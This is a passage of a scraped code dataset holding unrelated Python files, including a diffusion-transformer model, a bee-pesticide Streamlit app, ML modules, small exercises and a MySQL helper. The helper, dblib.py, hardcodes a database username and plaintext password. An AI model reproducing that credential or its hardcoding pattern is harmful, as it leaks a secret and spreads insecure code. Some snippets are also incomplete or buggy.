\\\n noise schedule and the variance of $z_t$ are changed. The rescale factor only \\\n rescales the noise schedule, so that it has a equivalent SNR, but keeps the \\\n variance of $z_t$ unchanged.\"\n )\n\n parser.add_argument(\n \"--embed-norm\",\n action=\"store_true\",\n help=\"Add embedding layer normalization\"\n )\n parser.add_argument(\n \"--embed-norm-affine\",\n action=\"store_true\",\n help=\"Add elementwise affine parameters to the embedding layer normalization\"\n )\n parser.add_argument(\n \"--embed-norm-before-proj\",\n action=\"store_true\",\n help=\"Put the embedding layer normalization before the projection layers\"\n )\n\n parser.add_argument(\n \"--self-cond\",\n action=\"store_true\",\n help=\"Self-conditioning\"\n )\n parser.add_argument(\n \"--self-cond-before-proj\",\n action=\"store_true\",\n help=\"Concatenate self-conditioning embeddings before the projection layers\"\n )\n\n parser.add_argument(\n \"--rounding-loss\",\n action=\"store_true\",\n help=\"Use the rounding loss instead of the anchor loss\"\n )\n\n parser.add_argument(\n \"--rescale-timesteps\",\n action=\"store_true\",\n help=\"Pass floating point timesteps into the model\"\n )\n\n def __init__(self, args, encoder, decoder):\n super().__init__(args, encoder, decoder)\n\n self.training_diffusion = GaussianDiffusion(\n betas=get_named_beta_schedule(\n args.noise_schedule,\n args.diffusion_steps,\n args.rescale_factor\n ),\n model_mean_type=None, model_var_type=None, loss_type=None\n )\n\n # so we have different schedules in training and decoding\n self.decoding_diffusion = SpacedDiffusion(\n space_timesteps(args.diffusion_steps, str(args.decoding_steps)),\n betas=get_named_beta_schedule(\n args.noise_schedule,\n args.diffusion_steps,\n args.decoding_rescale_factor\n ),\n model_mean_type=None, model_var_type=None, loss_type=None\n )\n\n self.timesteps_scale = (1000.0 / args.diffusion_steps) if args.rescale_timesteps else 1.0\n \n @classmethod\n def build_encoder(cls, args, src_dict, embed_tokens, project_in_dim):\n return DifformerEncoder(args, src_dict, embed_tokens, project_in_dim)\n\n @classmethod\n def build_decoder(cls, args, tgt_dict, embed_tokens, project_in_dim, project_out_dim):\n decoder = DifformerDecoder(args, tgt_dict, embed_tokens, project_in_dim, project_out_dim)\n if getattr(args, \"apply_bert_init\", False):\n decoder.apply(init_bert_params)\n return decoder\n\n @classmethod\n def build_model(cls, args, task):\n \"\"\" Build a new model instance \"\"\"\n\n transformer.base_architecture(args)\n base_architecture(args)\n\n if args.encoder_layers_to_keep:\n args.encoder_layers = len(args.encoder_layers_to_keep.split(\",\"))\n if args.decoder_layers_to_keep:\n args.decoder_layers = len(args.decoder_layers_to_keep.split(\",\"))\n\n if getattr(args, \"max_source_positions\", None) is None:\n args.max_source_positions = transformer.DEFAULT_MAX_SOURCE_POSITIONS\n if getattr(args, \"max_target_positions\", None) is None:\n args.max_target_positions = transformer.DEFAULT_MAX_TARGET_POSITIONS\n\n src_dict, tgt_dict = task.source_dictionary, task.target_dictionary\n latent_dim = args.latent_dim\n model_dim = args.model_dim\n\n if args.share_all_embeddings:\n if src_dict != tgt_dict:\n raise ValueError(\"--share-all-embeddings requires a joined dictionary\")\n if args.encoder_embed_dim != args.decoder_embed_dim:\n raise ValueError(\n \"--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim\"\n )\n if args.decoder_embed_path and (\n args.decoder_embed_path != args.encoder_embed_path\n ):\n raise ValueError(\n \"--share-all-embeddings not compatible with --decoder-embed-path\"\n )\n encoder_embed_tokens = cls.build_embedding(\n args, src_dict, latent_dim, args.encoder_embed_path\n )\n decoder_embed_tokens = encoder_embed_tokens\n args.share_decoder_input_output_embed = True\n \n else:\n encoder_embed_tokens = cls.build_embedding(\n args, src_dict, latent_dim, args.encoder_embed_path\n )\n decoder_embed_tokens = cls.build_embedding(\n args, tgt_dict, latent_dim, args.encoder_embed_path\n )\n\n # projection layers\n if latent_dim != model_dim:\n encoder_project_in_dim = nn.Linear(latent_dim, model_dim, bias=False)\n decoder_project_in_dim = (\n encoder_project_in_dim if args.share_project_in_dim\n else nn.Linear(latent_dim, model_dim, bias=False)\n )\n \n decoder_project_out_dim = nn.Linear(model_dim, latent_dim, bias=False)\n \n else:\n encoder_project_in_dim = nn.Identity()\n decoder_project_in_dim = nn.Identity()\n decoder_project_out_dim = nn.Identity()\n\n encoder = cls.build_encoder(args, src_dict, encoder_embed_tokens, encoder_project_in_dim)\n decoder = cls.build_decoder(\n args, tgt_dict, decoder_embed_tokens,\n decoder_project_in_dim, decoder_project_out_dim\n )\n\n return cls(args, encoder, decoder)\n\n def forward(self, src_tokens, src_lengths, _, tgt_tokens, **kwargs):\n \"\"\" Compute training losses \"\"\"\n\n # encoding\n encoder_out = self.encoder(src_tokens, src_lengths=src_lengths)\n\n # length prediction\n length_out = self.decoder.forward_length(normalize=False, encoder_out=encoder_out)\n length_tgt = self.decoder.forward_length_prediction(length_out, encoder_out, tgt_tokens)\n mask = tgt_tokens.ne(self.pad)\n\n # diffusion\n z_0 = self.decoder.forward_embedding(tgt_tokens)\n t = torch.randint(0, self.args.diffusion_steps, [len(z_0)], device=z_0.device)\n model_t = t * self.timesteps_scale\n\n noise = torch.randn_like(z_0) * self.args.noise_factor\n z_t = self.training_diffusion.q_sample(z_0, t, noise).type_as(z_0)\n\n # self-conditioning\n prev_z_0_hat = torch.zeros_like(z_0)\n if self.args.self_cond and random() < 0.5:\n with torch.no_grad():\n prev_z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n \n z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n logits = self.decoder.output_layer(z_0 if self.args.rounding_loss else z_0_hat)\n\n return {\n \"diffusion\": {\n \"loss\": (z_0_hat - z_0)[mask].square().mean()\n },\n\n \"word_ins\": {\n \"out\": logits,\n \"tgt\": tgt_tokens,\n \"mask\": mask,\n \"ls\": self.args.label_smoothing,\n \"nll_loss\": True,\n },\n \n \"length\": {\n \"out\": length_out,\n \"tgt\": length_tgt,\n \"factor\": self.decoder.length_loss_factor,\n },\n }\n\n def forward_decoder(self, z_t, step, mask, encoder_out, prev_z_0_hat=None, **kwargs):\n \"\"\" Sample z_{t-1} given z_t \"\"\"\n\n # rescale timesteps\n model_t = (\n self.decoding_diffusion.timestep_map[step]\n if self.args.decoding_fixed_t is None\n else self.args.decoding_fixed_t * self.args.diffusion_steps\n ) * self.timesteps_scale\n model_t = torch.full([len(z_t)], model_t, device=z_t.device)\n\n # predict z_0 \n z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n\n # clamping trick\n if self.args.clamping:\n tokens = self.decoder.output_layer(z_0_hat).argmax(-1)\n z_0_hat = self.decoder.forward_embedding(tokens)\n\n # sample z_{t-1}\n t = torch.tensor(step, device=z_t.device)\n mean, _, log_variance = self.decoding_diffusion.q_posterior_mean_variance(z_0_hat, z_t, t)\n noise = torch.randn_like(z_t) * self.args.decoding_noise_factor\n\n z_t = mean + (0.5 * log_variance).exp() * noise\n z_t = z_t.type_as(z_0_hat)\n\n return z_t, z_0_hat\n\n def forward_output_layer(self, z_t, mask):\n logits, tokens = self.decoder.output_layer(z_t).max(-1)\n scores = F.log_softmax(logits, -1)\n return tokens, scores, mask\n\n def initialize_z_t(self, encoder_out):\n \"\"\" Sample z_T \"\"\"\n # length prediction\n pred_length = self.decoder.forward_length_prediction(\n self.decoder.forward_length(normalize=True, encoder_out=encoder_out),\n encoder_out=encoder_out,\n )\n\n max_length = pred_length.clamp_(min=2).max()\n z_t = torch.randn(\n (len(pred_length), max_length, self.args.latent_dim),\n ) * self.args.decoding_noise_factor\n\n return z_t, pred_length\n\n def regenerate_beam(self, pred_length, length_beam_size, noise_beam_size):\n pred_length = (\n pred_length[:, None, None]\n + utils.new_arange(pred_length, 1, noise_beam_size, length_beam_size).transpose(-1, -2)\n - length_beam_size // 2\n ).flatten() # (bsz * length_beam_size * noise_beam_size)\n\n max_length = pred_length.clamp_(min=2).max()\n z_t = torch.randn(\n (len(pred_length), max_length, self.args.latent_dim),\n ) * self.args.decoding_noise_factor\n\n return z_t, pred_length\n\n\n@register_model_architecture(\"difformer\", \"difformer\")\ndef base_architecture(args):\n args.model_dim = getattr(args, \"model_dim\", 512)\n args.latent_dim = getattr(args, \"latent_dim\", 128)\n\n args.encoder_embed_path = getattr(args, \"encoder_embed_path\", None)\n args.encoder_embed_dim = args.model_dim\n args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 2048)\n args.encoder_layers = getattr(args, \"encoder_layers\", 6)\n args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 8)\n args.encoder_normalize_before = getattr(args, \"encoder_normalize_before\", False)\n args.encoder_learned_pos = getattr(args, \"encoder_learned_pos\", False)\n args.decoder_embed_path = getattr(args, \"decoder_embed_path\", None)\n args.decoder_embed_dim = args.model_dim\n args.decoder_ffn_embed_dim = getattr(\n args, \"decoder_ffn_embed_dim\", args.encoder_ffn_embed_dim\n )\n\n args.decoder_input_dim = getattr(args, \"decoder_input_dim\", args.latent_dim)\n args.decoder_output_dim = getattr(args, \"decoder_output_dim\", args.decoder_input_dim)\n\n args.decoder_layers = getattr(args, \"decoder_layers\", 6)\n args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 8)\n args.decoder_normalize_before = getattr(args, \"decoder_normalize_before\", False)\n args.decoder_learned_pos = getattr(args, \"decoder_learned_pos\", False)\n args.attention_dropout = getattr(args, \"attention_dropout\", 0.0)\n args.activation_dropout = getattr(args, \"activation_dropout\", 0.0)\n args.activation_fn = getattr(args, \"activation_fn\", \"relu\")\n args.dropout = getattr(args, \"dropout\", 0.1)\n args.adaptive_softmax_cutoff = getattr(args, \"adaptive_softmax_cutoff\", None)\n args.adaptive_softmax_dropout = getattr(args, \"adaptive_softmax_dropout\", 0)\n args.share_decoder_input_output_embed = getattr(\n args, \"share_decoder_input_output_embed\", False\n )\n args.share_all_embeddings = getattr(args, \"share_all_embeddings\", False)\n args.share_project_in_dim = getattr(args, \"share_project_in_dim\", False)\n\n args.no_token_positional_embeddings = getattr(\n args, \"no_token_positional_embeddings\", False\n )\n args.adaptive_input = getattr(args, \"adaptive_input\", False)\n args.apply_bert_init = getattr(args, \"apply_bert_init\", False)\n\n # --- special arguments ---\n args.sg_length_pred = getattr(args, \"sg_length_pred\", False)\n args.pred_length_offset = getattr(args, \"pred_length_offset\", False)\n args.length_loss_factor = getattr(args, \"length_loss_factor\", 0.1)\n\n args.diffusion_steps = getattr(args, \"diffusion_steps\", 2000)\n\n args.noise_schedule = getattr(args, \"noise_schedule\", \"linear\")\n args.noise_factor = getattr(args, \"noise_factor\", 1.0)\n args.rescale_factor = getattr(args, \"rescale_factor\", 1.0)\n\n args.embed_norm = getattr(args, \"embed_norm\", False)\n args.embed_norm_affine = getattr(args, \"embed_norm_affine\", False)\n args.embed_norm_before_proj = getattr(args, \"embed_norm_before_proj\", False)\n\n args.self_cond = getattr(args, \"self_cond\", False)\n args.self_cond_before_proj = getattr(args, \"self_cond_before_proj\", False)\n\n args.rounding_loss = getattr(args, \"rounding_loss\", False)\n\n args.rescale_timesteps = getattr(args, \"rescale_timesteps\", False)\n\n\n@register_model_architecture(\"difformer\", \"difformer_base\")\ndef difformer_base(args):\n args.model_dim = getattr(args, \"model_dim\", 768)\n args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 3072)\n args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 12)\n\n args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 3072)\n args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 12)\n\n base_architecture(args)\n\n\n@register_model_architecture(\"difformer\", \"difformer_iwslt_de_en\")\ndef difformer_nat_iwslt_de_en(args):\n args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 1024)\n args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 4)\n\n args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 1024)\n args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 4)\n\n base_architecture(args)\n\n\n@register_model_architecture(\"transformer\", \"transformer_base\")\ndef transformer_base(args):\n args.encoder_embed_dim = getattr(args, \"encoder_embed_dim\", 768)\n args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 3072)\n args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 12)\n args.decoder_embed_dim = getattr(args, \"decoder_embed_dim\", 768)\n args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 3072)\n args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 12)\n transformer.base_architecture(args)\n","repo_name":"zhjgao/difformer","sub_path":"difformer/difformer.py","file_name":"difformer.py","file_ext":"py","file_size_in_byte":16811,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"22073366261","text":"PLUS = '+'\nMINUS = '-'\nDIVIDE = '/'\n\n\n# lin : [level, [n, previousops]]\ndef reduce(lin):\n level = lin[0]\n siz = len(lin)\n lout = [level+1]\n for i in range(1, siz):\n olde_n = lin[i][O]\n if olde_n == 1:\n continue\n olde_o = lin[i][1]\n # if n even 3 possibilities\n if olde_n%2 == 0:\n lout.append([])\n \n \n \n \n \n \n","repo_name":"orey/stuff","sub_path":"dev/foobar/test04v9.py","file_name":"test04v9.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36470727610","text":"\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\n\nfrom rdkit import Chem\nfrom rdkit.Chem import Draw\nfrom rdkit.Chem import inchi\nfrom rdkit import DataStructs\n\nour_color_discrete_map={\n \"unknown\": \"rgba(180, 180, 180, 0.24)\",\n \"low\": \"rgba(5, 192, 5, 0.74)\",\n \"medium\": \"rgba(255, 112, 0, 0.74)\",\n \"high\": \"rgba(224, 19, 19, 0.74)\",\n \"watching\": \"blue\"\n }\n\ndef user_input_features(bees):\n pesticides = [\"{} - {}\".format(a_, b_) for a_, b_ in zip(bees.index.map(str).values , bees['name'].values)]\n pesticide_selection = st.sidebar.selectbox('Which pesticide would you like to know more about?', pesticides)\n n_neighbours = st.sidebar.slider('Neighbours', 1, 10, 3)\n \n data = {'n_neighbours': n_neighbours,\n 'pesticide_selection': pesticide_selection}\n features = pd.DataFrame(data, index=[0])\n return features\n\ndef give_nearest_n(proj_3d, point, k):\n n = proj_3d.shape[0]\n data = proj_3d.copy()\n\n dist_matrix = np.zeros((n, n))\n for i in range(1,n):\n dist = np.linalg.norm(data[:i,:]-data[i,:] , axis=1)\n for id, d in enumerate(dist):\n dist_matrix[i,id] = d\n\n dist_matrix = dist_matrix + dist_matrix.T\n\n nearest_n = np.zeros_like(dist_matrix, dtype=int)\n for id, row in enumerate(dist_matrix):\n nearest_n[id] = np.argsort(row)\n nearest_n = nearest_n[:,1:]\n return nearest_n[point, 0:k]\n\ndef show_atom_number(mol, label):\n for atom in mol.GetAtoms():\n atom.SetProp(label, str(atom.GetIdx()+1))\n return mol\n\ndef get_labels(bees, slected_pesticide_idx):\n y_full = bees['honeybees_contact_kill_risk'].values\n y_full = y_full.add_categories('watching')\n y_full[slected_pesticide_idx] = 'watching' # What point do you want to watch?\n\n return y_full\n\ndef plot_2d(proj_2d, bees, slected_pesticide_idx):\n y_full = get_labels(bees, slected_pesticide_idx)\n\n fig_2d = px.scatter(\n proj_2d, x=0, y=1,\n hover_data=[bees.index.map(str).values, bees['name'].values],\n color=y_full, labels={'color': 'risk'},\n color_discrete_map=our_color_discrete_map,\n )\n return fig_2d\n\ndef plot_3d(proj_3d, bees, slected_pesticide_idx):\n y_full = get_labels(bees, slected_pesticide_idx)\n\n\n fig_3d = px.scatter_3d(\n proj_3d, x=0, y=1, z=2,\n hover_data=[bees.index.map(str).values, bees['name'].values],\n color=y_full, labels={'color': 'risk'},\n color_discrete_map=our_color_discrete_map,\n )\n fig_3d.update_traces(marker_size=5)\n\n fig_3d.show()\n\n return fig_3d\n\n\ndef streamlit_stuff():\n\n st.write(\"\"\"\n # Bee-Friendly Pesticide Classifier\n\n This app lets you choose one pesticide from a collection of pesticides and predicts the risk of death for a bee if she encounters that specific pesticide.\n We infer the risk by looking at the risk-rating of similar pesticides (from a chemical molecule structure perspective).\n \"\"\")\n\n st.sidebar.header('User Input Parameters')\n\n bees = pd.read_pickle('scraped_molecules_honeybees_working.pickle')\n bees['honeybees_contact_kill_risk'] = bees['honeybees_contact_kill_risk'].cat.add_categories('unknown').fillna(\"unknown\")\n df = user_input_features(bees)\n\n st.subheader('User Input Parameters')\n st.write(df)\n\n slected_pesticide = df['pesticide_selection'].values[0]\n slected_pesticide_idx = int(slected_pesticide.split(\"-\")[0][:-1])\n st.write(slected_pesticide, slected_pesticide_idx)\n\n proj_2d = np.load(\"2317_proj_2d.npy\")\n st.header(\"2D UMAP\")\n st.plotly_chart(plot_2d(proj_2d, bees, slected_pesticide_idx))\n\n proj_3d = np.load(\"2317_proj_3d.npy\")\n st.header(\"3D UMAP\")\n st.plotly_chart(plot_3d(proj_3d, bees, slected_pesticide_idx))\n\n\n slected_pesticide_row = bees.iloc[slected_pesticide_idx, :]\n st.header(\"Info about \" + slected_pesticide_row['name'])\n st.write(f\"This one is currently classified as {str(slected_pesticide_row['honeybees_contact_kill_risk'])}.\")\n\n m = inchi.MolFromInchi(slected_pesticide_row['inchi'])\n fig = Draw.MolToMPL(m)\n st.pyplot(fig)\n\n\n\n # K-NN\n st.subheader('Nearest Neighbours')\n\n k = int(df['n_neighbours'].values[0])\n nn = give_nearest_n(proj_3d, slected_pesticide_idx, k)\n st.write(nn)\n\n df_nn = bees.iloc[nn]\n st.write(df_nn)\n\n for n in nn:\n # st.write(df_nn.loc[n])\n st.subheader('Neighbour ' + df_nn.loc[n, 'name'] + ': ' + str(df_nn.loc[n, 'honeybees_contact_kill_risk']))\n nn_mol = inchi.MolFromInchi(df_nn.loc[n, 'inchi'])\n fig = Draw.MolToMPL(nn_mol)\n st.pyplot(fig)\n\n\n\n\n # st.subheader('Class labels and their corresponding index number')\n # st.write(iris.target_names)\n\n # st.subheader('Prediction')\n # st.write(iris.target_names[prediction])\n\n\n # st.subheader('Prediction Probability')\n # st.write(prediction_proba)\n\nstreamlit_stuff()","repo_name":"ScholliYT/bee-friendly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74585333866","text":"\nimport pymysql.cursors\nimport time\n\nDB_PASS = 'tabard5]deathblows'\nDB_USER = 'app'\nDB_NAME = 'ambi'\n\n\ndef makeConnection(db_name=DB_NAME):\n\treturn pymysql.connect(\n\t\thost='localhost',\n\t\tuser=DB_USER,\n\t\tpassword=DB_PASS,\n\t\tdb=db_name,\n\t\tcharset='utf8mb4',\n\t\tcursorclass=pymysql.cursors.DictCursor\n\t\t)\n\n\ndef call_sp(sql):\n\tconnection = makeConnection()\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(str(sql))\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\t\n\ndef sensorDB(sql):\n\tconnection = makeConnection(db_name='Sensor')\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(sql)\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\n\ndef call_sql(raw_sql:str):\n\tconnection = makeConnection()\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(raw_sql)\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\n\n# type stuff\ndef now():\n\treturn time.strftime('%Y-%m-%d %H:%M:%S')\n\ndef DateFromTicks(ticks):\n\treturn Date(*time.localtime(ticks)[:3])\n\ndef TimeFromTicks(ticks):\n\treturn Time(*time.localtime(ticks)[3:6])\n\ndef TimestampFromTicks(ticks):\n\treturn Timestamp(*time.localtime(ticks)[:6])\n\n\ndef json_defaults(obj):\n\tif isinstance(obj, datetime.datetime):\n\t\treturn str(obj)\n\tif isinstance(obj, decimal.Decimal):\n\t\treturn float(obj)\n\tif isinstance(obj, long):\n\t\treturn str(obj)\n\traise TypeError","repo_name":"jmade/Ambilight-Server","sub_path":"lib/python/dblib.py","file_name":"dblib.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18215007709","text":"import pygame\ncor = {'traço': '\\033[35m', 'ex': '\\033[4;31m', 'título': '\\033[1;34m', 'reset': '\\033[m'}\nprint('{}-=-{}'.format(cor['traço'], cor['reset'])*18, '{} Exercício 021 {}'.format(cor['ex'], cor['reset']),\n '{}-=-{}'.format(cor['traço'], cor['reset'])*18)\nprint('{}Faça um programa em Python que abra e reproduza aúdio de um arquivo MP3.{}'\n .format(cor['título'], cor['reset']))\nprint('{}-=-{}'.format(cor['traço'], cor['reset'])*42)\npygame.init()\npygame.mixer.music.load('king.mp3')\npygame.mixer.music.play()\npygame.event.wait()\n","repo_name":"WesleyOlliver/CursoPython","sub_path":"ex021.py","file_name":"ex021.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37971761054","text":"\"\"\"\nAuthors: William Kozlowski & Jamin Glass\nFile: Main.py\nDate Completed: March 5rd, 2023\nmain excution of the flashcard program\n\"\"\"\n\nimport time, GeneralBioCards, GeneralChemCards, GeneralPhysicsCards, CustomFlashcards\n\nprint (\" Flash Card Generator \\nby: William Kozlowski and Jamin Glass\")\n\ntime.sleep(1.5)\n\nwhile True:\n\n user_choice = input(\"______________________________________\\nPlease input an option below:\\na. General Biology\\nb. General Chemistry\\nc. General Phyiscs\\nd. Custom Flash Cards\\n(please print either 'a', 'b', 'c', or 'd' in terminal, or print 'exit' to exit the session): \")\n\n if user_choice == \"a\":\n print(\"______________________________________\") #easier on the eyes\n GeneralBioCards.BioCards()\n\n elif user_choice == \"b\":\n print(\"______________________________________\") #easier on the eyes\n GeneralChemCards.ChemCards()\n\n elif user_choice == \"c\":\n print(\"______________________________________\") #easier on the eyes\n GeneralPhysicsCards.PhysicsCards()\n\n elif user_choice == \"d\":\n print(\"______________________________________\") #easier on the eyes\n CustomFlashcards.CustomFlashCards()\n\n elif user_choice == \"exit\":\n print(\"______________________________________\\nUntil next time!\")\n break \n \n else:\n print(\"Incorrect input, try again.\")\n\n ","repo_name":"williamkozlowski/Hackathon2023","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32670392518","text":"from buttons import Knop\nfrom names import Names\n\ndef setup():\n global knop, names\n size(800,400)\n knop = Knop()\n names= Names()\n \n\ndef draw():\n for i in range(3):\n knop.button(100+(i*200),10,40,40)\n names.name(\"Everknown\", 100+(i*200), 50,200,20)\n noLoop()\n","repo_name":"guanhaowu/Project1-bordspel","sub_path":"boxbuttons/boxbuttons.pyde","file_name":"boxbuttons.pyde","file_ext":"pyde","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32836357540","text":"'''\nImplementation Notes\n\n\nhttps://github.com/deepmind/acme/blob/master/acme/agents/tf/mog_mpo/networks.py#L60\nCritic Architecture:\nnum_dimensions = 1\nnum_components\ninit_scale\n\n\nhttps://github.com/deepmind/acme/blob/f8a4edbcb81165b4cd93fd7926b879f0e7fbfc49/acme/tf/networks/distributional.py#L242\nUnivariateGaussianMixture:\ninit_scale\nnum_components\nnum_dimensions = 1\nmultivariate=False\n\n\nhttps://github.com/deepmind/acme/blob/f8a4edbcb81165b4cd93fd7926b879f0e7fbfc49/acme/tf/networks/distributional.py#L142\nself._scale_factor = init_scale / tf.nn.softplus(0.)\nlogits_size = self._num_dimensions * self._num_components\n\nw_init = tf.initializers.VarianceScaling(1e-5)\nself._logit_layer = snt.Linear(logits_size, w_init=w_init)\nself._loc_layer = snt.Linear(self._num_dimensions * self._num_components, w_init=w_init)\nself._scale_layer = snt.Linear(self._num_dimensions * self._num_components, w_init=w_init)\n\nwhen called:\nlogits = self._logit_layer(inputs)\nlocs = self._loc_layer(inputs)\nscales = self._scale_layer(inputs)\n\nscales = self._scale_factor * tf.nn.softplus(scales) + _MIN_SCALE\n\nshape = [-1, self._num_dimensions, self._num_components]\n\nlocs = tf.reshape(locs, shape)\nscales = tf.reshape(scales, shape)\ncomponents_distribution = tfd.Normal(loc=locs, scale=scales)\n\nlogits = tf.reshape(logits, shape)\n\n# Create the mixture distribution.\ndistribution = tfd.MixtureSameFamily(\n mixture_distribution=tfd.Categorical(logits=logits),\n components_distribution=components_distribution\n)\n\ndistribution = tfd.Independent(distribution)\n'''\n\nimport haiku as hk\nfrom jax import nn\nfrom jax import numpy as jnp\n\n\nclass MoGCritic(hk.Module):\n def __init__(self, input_dim, structure, num_groups, num_components, init_scale):\n super().__init__()\n self.structure = structure\n self.num_components = num_components\n self.init_scale = init_scale\n self.num_groups = num_groups\n self.init = hk.initializers.Orthogonal(jnp.sqrt(2.))\n self.out_init = hk.initializers.Orthogonal(1.)\n\n\n def __call__(self, state, action):\n info = {}\n x = jnp.concatenate([state, action], axis=-1)\n info['input'] = x\n\n for i, width in enumerate(self.structure):\n name = f'layer{i}'\n x = hk.Linear(width, w_init=self.init, name=name)(x)\n if self.num_groups:\n x = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'{name}_nosn_ln')(x)\n\n info[name] = x\n x = nn.relu(x)\n\n shape = [-1, 1, self.num_components]\n\n mus = hk.Linear(self.num_components, w_init=self.out_init, name='mus')(x)\n mus = mus.reshape(shape)\n info['mus'] = mus\n\n stdevs = hk.Linear(self.num_components, w_init=self.out_init, name='stdevs')(x)\n stdevs = self.init_scale * nn.softplus(stdevs) / nn.softplus(0.) + 1e-4\n stdevs = stdevs.reshape(shape)\n info['stdevs'] = stdevs\n\n logits = hk.Linear(self.num_components, w_init=self.out_init, name='logits')(x)\n logits = logits.reshape(shape)\n info['logits'] = logits\n\n return info\n","repo_name":"dyth/doublegum","sub_path":"policies_cont/networks/mog_critic.py","file_name":"mog_critic.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"2325823241","text":"import turtle as t\r\na = 10\r\nfor n in range(10):\r\n for i in range(4):\r\n t.fd(a)\r\n t.lt(90)\r\n t.rt(135)\r\n t.penup()\r\n t.fd(a*2**0.5)\r\n t.pendown()\r\n t.lt(135)\r\n a*=3\r\n","repo_name":"ytiolllok/Yuri_b02-011_lab2","sub_path":"turtle5.py","file_name":"turtle5.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36649817111","text":"import torch\nimport torch.nn as nn\n\nclass ChannelSpatialAttention(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, max_length, ratio=16):\n super(ChannelSpatialAttention, self).__init__()\n self.channel_attention = ChannelAttention(in_channels, max_length, ratio)\n self.spatial_attention = SpatialAttention(out_channels, max_length, kernel_size)\n\n def forward(self, x):\n out = self.channel_attention(x)\n out = self.spatial_attention(out)\n return out\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_channels, max_length, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool1d(max_length) # [batch, in_channels, src_len]\n self.max_pool = nn.AdaptiveMaxPool1d(max_length) # [batch, in_channels, src_len]\n self.fc = nn.Sequential(nn.Conv1d(in_channels, in_channels//ratio, 1, bias=False),\n nn.ReLU(),\n nn.Conv1d(in_channels//ratio, in_channels, 1, bias=False))\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n out = self.sigmoid(out) # [batch, in_channels, src_len]\n return out\n\nclass SpatialAttention(nn.Module):\n def __init__(self, in_channels, max_length, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool1d(max_length)\n self.max_pool = nn.AdaptiveMaxPool1d(max_length)\n self.conv1 = nn.Conv1d(in_channels, in_channels, kernel_size, padding=(kernel_size-1)//2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n # avg_out = torch.mean(x, dim=1, keepdim=True)\n # max_out, _ = torch.max(x, dim=1, keepdim=True)\n avg_out = self.avg_pool(x)\n max_out = self.max_pool(x)\n out = torch.cat([avg_out, max_out], dim=1) # 进行连接\n out = self.conv1(out) # [batch, 2 * in_channels, src_len]\n out = self.sigmoid(out)\n return out\n","repo_name":"jiangnanboy/CNN4IE","sub_path":"cnn4ie/channel_spatial_attention_cnn/channel_spatial_attention.py","file_name":"channel_spatial_attention.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"43054118006","text":"from binance.exceptions import BinanceAPIException\n\nfrom Bot.AccountBalances import AccountBalances\nfrom Bot.FXConnector import FXConnector\nfrom Bot.TradeEnums import OrderStatus\nfrom 